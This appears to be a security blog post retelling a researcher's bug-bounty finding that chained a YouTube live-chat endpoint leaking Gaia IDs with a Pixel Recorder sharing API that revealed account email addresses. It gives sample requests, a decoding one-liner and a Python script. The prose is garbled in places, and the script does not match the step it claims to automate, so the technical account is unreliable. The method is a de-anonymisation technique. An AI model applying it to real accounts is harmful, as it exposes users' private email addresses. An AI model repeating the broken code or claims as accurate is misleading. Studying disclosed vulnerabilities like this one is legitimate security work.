Greetings, readers of HackingBlogs! In this piece, we will examine a strange security flaw that the researcher Brutecat found that might let someone obtain the email address of any YouTube user. It is interesting to note that YouTube gave Brutecat a $10,000 a reward for spotting this error. Even though this flaw may seem alarming, we will walk you through it step-by-step, describing how it functions and how it was discovered.
The Initial Discovery: Leaking Google Account IDs on YouTube
When YOUTUBE was looking over Google’s Internal People API (Staging) discovery paper, the problem started. Brutecat discovered something odd while sorting through this data: the banned user functionality was utilising disguised Gaia IDs, which are Google accounts’ internal identifiers. When blocking someone on YouTube, a Gaia ID is usually used. The main issue was that this identifier was being revealed in an inappropriate manner.
A user’s encoded Gaia ID is added to the blocklist, which can be accessed through their Google account settings, when they block someone on YouTube. This implies that if someone manages to get access to the blocklist, they may be able to find the actual Google account that is responsible for that YouTube channel by using the Gaia ID of the user they blocked.
Escalating the Issue: Can We Leak Gaia IDs from All YouTube Channels?
Brutecat thought the problem might be escalated, even though it initially appeared to be restricted to prohibited users. The next reasonable query was if this problem might be used to expose the Gaia IDs of any YouTube channel, not only prohibited ones. Indeed, the response was yes.
After some research, Brutecat found that a request containing base64 encoded protobuf data was sent to the backend while interacting with the live chat context menu. When this data was decoded, it revealed the user’s Gaia ID from the live chat, making it possible to reveal it without barring the user.
This is an illustration of a POST request sent while using YouTube’s context menu:
POST /youtubei/v1/live_chat/get_item_context_menu?params=<encoded-data> HTTP/2
Host: www.youtube.com
Cookie: <redactedDecoding the Request Params: How Gaia IDs Are Leaked
Simple tools like base64 and protobuf can be used to decode the request data sent during the context menu interaction. To obtain the Gaia ID, Brutecat decoded the request parameters as follows:
$ echo -n "<encoded-string>" | base64 -d | sed 's/%3D/=/g' | base64 -d | protoc --decode_rawThe targeted user’s Gaia ID is included in the decrypted data:
{
"user": {
"gaia_id": "113907466537670370590"
}
}Brutecat had to figure out how to turn the Gaia ID into a legitimate email address after obtaining it.
The Final Step: Converting a Gaia ID to an Email Address
One important finding from my search was that Google’s Pixel Recorder service revealed a method for carrying out this conversion. The service would send an email with the actual address linked to the Google account when a user shared a recording from the Pixel Recorder.
The email address associated with that Google account was returned by the Pixel Recorder API when Brutecat shared a recording with the disguised Gaia ID.
This is an illustration of how to share a recording using a POST request:
POST /$rpc/java.com.google.wireless.android.pixel.recorder.protos.PlaybackService/WriteShareList HTTP/2
Host: pixelrecorder-pa.clients6.google.com
Content-Type: application/json+protobuf
Authorization: <auth-token>As part of the sharing procedure, the request sends the Gaia ID, and the response contains the account’s email address:
An example of a response
[
"28bc3792-9bdb-4aed-9a78-17b0954abc7d",
[
[null, 2, "vrptest2@gmail.com"]
]
]Code Example: How to Retrieve the Email
Brutecat uses the following Python script to automate this procedure, which obtains the related email and sends the Gaia ID to the Pixel Recorder API:
import requests
BASE_URL = "https://pixelrecorder-pa.clients6.google.com/$rpc/java.com.google.wireless.android.pixel.recorder.protos.PlaybackService/"
headers = {
"Host": "pixelrecorder-pa.clients6.google.com",
"Content-Type": "application/json+protobuf",
"Authorization": "<auth-token>"
}
def get_recording_uuid(share_id: str):
payload = f"[\"{share_id}\"]"
response = requests.post(BASE_URL + "GetRecordingInfo", headers=headers, data=payload)
return response.json()
def main():
share_id = input("Enter share ID: ")
uuid = get_recording_uuid(share_id)
print("UUID:", uuid)
if __name__ == "__main__":
main()Brutecat was able to obtain the email address linked to the Gaia ID by executing this script.
Google needs to fix this flaw immediately in order to stop user data from leaking. Removing Gaia IDs from any accessible endpoints—particularly the blocklist and live chat context menus—and making sure that sensitive user data is properly accessed across services like Pixel Recorder are part of the solution.
A solution for YouTube would be to secure other backend services that might permit email leakage and make sure that Gaia IDs are not available through these APIs.
